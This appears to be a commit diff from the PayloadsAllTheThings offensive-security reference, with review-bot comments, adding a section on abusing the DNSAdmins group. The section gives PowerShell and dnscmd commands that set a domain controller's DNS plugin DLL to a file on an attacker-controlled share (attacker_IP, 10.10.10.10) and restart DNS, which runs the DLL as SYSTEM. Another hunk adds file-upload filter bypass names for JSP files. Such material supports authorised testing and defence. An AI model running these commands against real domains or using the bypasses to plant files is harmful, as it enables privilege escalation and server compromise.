mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 10:56:10 +00:00
DNS Admins Group
This commit is contained in:
parent
3066615cde
commit
0c7da8ec41
@ -84,6 +84,7 @@
|
|||||||
- [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
|
- [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
|
||||||
- [Pass-The-Certificate](#pass-the-certificate)
|
- [Pass-The-Certificate](#pass-the-certificate)
|
||||||
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||||
|
- [Abusing DNS Admins Group](#abusing-dns-admins-group)
|
||||||
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
||||||
- [GenericAll](#genericall)
|
- [GenericAll](#genericall)
|
||||||
- [GenericWrite](#genericwrite)
|
- [GenericWrite](#genericwrite)
|
||||||
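Review bot: the anchor `#abusing-dns-admins-group` matches the new `### Abusing DNS Admins Group` heading added further down, but this rendering drops list indentation, so confirm the entry is indented at the same level as `- [Abusing Active Directory ACLs/ACEs]`, the sibling `###` section it precedes, rather than nested under `Dangerous Built-in Groups Usage`.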
@ -2583,6 +2584,39 @@ Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccount
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Abusing DNS Admins Group
|
||||||
|
|
||||||
|
> It is possible for the members of the DNSAdmins group to load arbitrary DLL with the privileges of dns.exe (SYSTEM).
|
||||||
|
|
||||||
|
:warning: Require privileges to restart the DNS service.
|
||||||
|
|
||||||
|
* Enumerate members of DNSAdmins group
|
||||||
|
```ps1
|
||||||
|
Get-NetGroupMember -GroupName "DNSAdmins"
|
||||||
|
Get-ADGroupMember -Identity DNSAdmins
|
||||||
|
```
|
||||||
|
* Change dll loaded by the DNS service
|
||||||
|
```ps1
|
||||||
|
# with RSAT
|
||||||
|
dnscmd <servername> /config /serverlevelplugindll \\attacker_IP\dll\mimilib.dll
|
||||||
|
dnscmd 10.10.10.11 /config /serverlevelplugindll \\10.10.10.10\exploit\privesc.dll
|
||||||
|
|
||||||
|
# with DNSServer module
|
||||||
|
$dnsettings = Get-DnsServerSetting -ComputerName <servername> -Verbose -All
|
||||||
|
$dnsettings.ServerLevelPluginDll = "\attacker_IP\dll\mimilib.dll"
|
||||||
|
Set-DnsServerSetting -InputObject $dnsettings -ComputerName <servername> -Verbose
|
||||||
|
```
|
||||||
|
* Check the previous command success
|
||||||
|
```ps1
|
||||||
|
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
|
||||||
|
```
|
||||||
|
* Restart DNS
|
||||||
|
```ps1
|
||||||
|
sc \\dc01 stop dns
|
||||||
|
sc \\dc01 start dns
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### Abusing Active Directory ACLs/ACEs
|
### Abusing Active Directory ACLs/ACEs
|
||||||
|
|
||||||
Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner).
|
Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner).
|
||||||
|
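Review bot: the UNC path in the DNSServer-module variant is missing a leading backslash: `$dnsettings.ServerLevelPluginDll = "\attacker_IP\dll\mimilib.dll"` should read `"\\attacker_IP\dll\mimilib.dll"`, as the `dnscmd` line above it already does; as written it is a relative path on the DNS server and the `Get-ItemProperty` check step will show a value that does not point at the intended DLL. In the restart block, `sc \\dc01 stop dns` and `sc \\dc01 start dns` sit in a `ps1` fence, where `sc` is PowerShell's alias for `Set-Content`; write `sc.exe \\dc01 stop dns` (or note that the block is meant for cmd) so the fence matches the command. The `:warning:` line could also mention that the value read in the check step, `HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll`, is the setting defenders should audit and alert on for this technique.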
@ -65,7 +65,8 @@
|
|||||||
* Multiple dots : `file.php......` , in Windows when a file is created with dots at the end those will be removed.
|
* Multiple dots : `file.php......` , in Windows when a file is created with dots at the end those will be removed.
|
||||||
* Whitespace characters: `file.php%20`, `file.php%0d%0a.jpg`
|
* Whitespace characters: `file.php%20`, `file.php%0d%0a.jpg`
|
||||||
* Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
|
* Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
|
||||||
* Slash: `file.php/`, `file.php.\`
|
* Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp`
|
||||||
|
* Multiple special characters: `file.jsp/././././.`
|
||||||
- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
|
- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
|
||||||
* `Content-Type : image/gif`
|
* `Content-Type : image/gif`
|
||||||
* `Content-Type : image/png`
|
* `Content-Type : image/png`
|
||||||
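Review bot: the two new variants `file.j\sp` and `file.j/sp` are appended to the `Slash:` item, whose existing examples are trailing separators; the new ones put a separator inside the extension, which is a different trick, so they read better as their own bullet with a word on which platform they apply to (the `.jsp` examples and the Java reference added in this commit point at Java servlet-container path handling). The same applies to `Multiple special characters: file.jsp/././././.`: state the platform so the entry is not taken as generic.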
@ -161,4 +162,5 @@ When a ZIP/archive file is automatically decompressed after the upload
|
|||||||
* [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/)
|
* [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/)
|
||||||
* [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf)
|
* [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf)
|
||||||
* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0)
|
* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0)
|
||||||
* [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
|
* [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
|
||||||
|
* [Arbitrary File Upload Tricks In Java - pyn3rd](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/)
|
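Review bot: the new reference entry omits a publication date while the first entry in this list carries one; the URL encodes 2022/05/07, so `[Arbitrary File Upload Tricks In Java - pyn3rd, 7 May 2022](...)` keeps the list's style consistent.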